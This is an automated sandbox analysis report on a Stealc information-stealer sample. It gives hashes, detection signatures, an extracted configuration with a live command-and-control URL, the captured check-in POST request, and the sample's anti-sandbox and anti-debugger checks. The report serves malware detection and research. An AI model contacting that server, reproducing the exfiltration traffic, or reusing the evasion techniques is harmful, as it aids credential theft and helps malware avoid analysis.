Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532905
MD5:0346a5b7e84da53552826eb2061eb3de
SHA1:5a69a7e1fa61bb7f83f46e00616b2f2465891550
SHA256:077cfebf17a05de67e6bd32828a6710312b4ac28c1475ae4cc3346b8607d254a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5004 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0346A5B7E84DA53552826EB2061EB3DE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5004JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5004JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.620000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T06:53:06.649678+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.620000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpLVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php7Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpEVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpCVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 54%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0062C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00627240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00627240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00629AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00629B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00629B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00638EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00638EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00634910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0062DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0062E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00634570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0062ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0062BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0062DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00633EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0062F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F68A FindFirstFileA,0_2_0062F68A

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 43 32 44 30 46 34 45 31 32 42 32 32 32 35 30 36 35 39 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"82C2D0F4E12B2225065987------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"doma------DGDBKFBAKFBFHIECFBFI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00626280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00626280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 43 32 44 30 46 34 45 31 32 42 32 32 32 35 30 36 35 39 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"82C2D0F4E12B2225065987------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"doma------DGDBKFBAKFBFHIECFBFI--
                Source: file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2147145348.0000000001358000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2147145348.0000000001376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
                Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
                Source: file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
                Source: file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpL
                Source: file.exe, 00000000.00000002.2147145348.0000000001368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
                Source: file.exe, 00000000.00000002.2147145348.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E0_2_009F208E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E48AC0_2_009E48AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6C8D50_2_00A6C8D5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A01D80_2_008A01D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A29030_2_009A2903
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DF92F0_2_009DF92F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E99630_2_009E9963
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EEABA0_2_009EEABA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD3CF0_2_00AAD3CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E73F10_2_009E73F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F3B0D0_2_009F3B0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009793370_2_00979337
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093E4060_2_0093E406
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E2D9B0_2_009E2D9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6B5820_2_00A6B582
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EB51F0_2_009EB51F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090FED00_2_0090FED0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F564E0_2_009F564E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DDE4B0_2_009DDE4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E7E6D0_2_009E7E6D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006245C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xxaxmlaz ZLIB complexity 0.9948426506576935
                Source: file.exe, 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00639600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00633720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q6LV1JS6.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 54%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1829888 > 1048576
                Source: file.exeStatic PE information: Raw size of xxaxmlaz is bigger than: 0x100000 < 0x198a00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.620000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxaxmlaz:EW;mnkxawcp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxaxmlaz:EW;mnkxawcp:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00639860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c291c should be: 0x1cbf24
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xxaxmlaz
                Source: file.exeStatic PE information: section name: mnkxawcp
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8F0A8 push ecx; mov dword ptr [esp], eax0_2_00A8F0F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FB090 push ebp; mov dword ptr [esp], edx0_2_009FB0F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ecx; mov dword ptr [esp], 46104685h0_2_009F2093
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 6BAB6E0Ch; mov dword ptr [esp], ebp0_2_009F20C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push edx; mov dword ptr [esp], eax0_2_009F2112
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push edx; mov dword ptr [esp], edi0_2_009F2202
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ebp; mov dword ptr [esp], ecx0_2_009F2243
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ecx; mov dword ptr [esp], esi0_2_009F225D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 248EE22Ch; mov dword ptr [esp], ecx0_2_009F227B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push esi; mov dword ptr [esp], edi0_2_009F22C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ebx; mov dword ptr [esp], eax0_2_009F2312
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ecx; mov dword ptr [esp], esi0_2_009F2342
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 35C167C7h; mov dword ptr [esp], eax0_2_009F2355
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push edx; mov dword ptr [esp], esi0_2_009F2369
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 4A7546B0h; mov dword ptr [esp], eax0_2_009F2379
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 443A2291h; mov dword ptr [esp], ecx0_2_009F23A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ebp; mov dword ptr [esp], 00000000h0_2_009F23E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ecx; mov dword ptr [esp], ebp0_2_009F2411
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 149194B5h; mov dword ptr [esp], ecx0_2_009F2544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 4B656DD1h; mov dword ptr [esp], esp0_2_009F254C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push ecx; mov dword ptr [esp], ebp0_2_009F25CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push edi; mov dword ptr [esp], esi0_2_009F25ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push edx; mov dword ptr [esp], ebp0_2_009F264C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push eax; mov dword ptr [esp], ecx0_2_009F265D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 2F5CEF65h; mov dword ptr [esp], edi0_2_009F267A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 02730901h; mov dword ptr [esp], edx0_2_009F2752
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 49A27EAEh; mov dword ptr [esp], eax0_2_009F275F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 1E7FFD71h; mov dword ptr [esp], ecx0_2_009F27E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 3332EB4Ch; mov dword ptr [esp], ebp0_2_009F283E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push 23FB7B74h; mov dword ptr [esp], edx0_2_009F2962
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F208E push eax; mov dword ptr [esp], 77AA37ADh0_2_009F2A65
                Source: file.exeStatic PE information: section name: xxaxmlaz entropy: 7.954308030352957

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00639860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13699
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8821EA second address: 8821F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9FAC second address: 9F9FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9FB0 second address: 9F9FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA14B second address: 9FA156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0B09070BC6h 0x0000000a popad 0x0000000b rdtsc
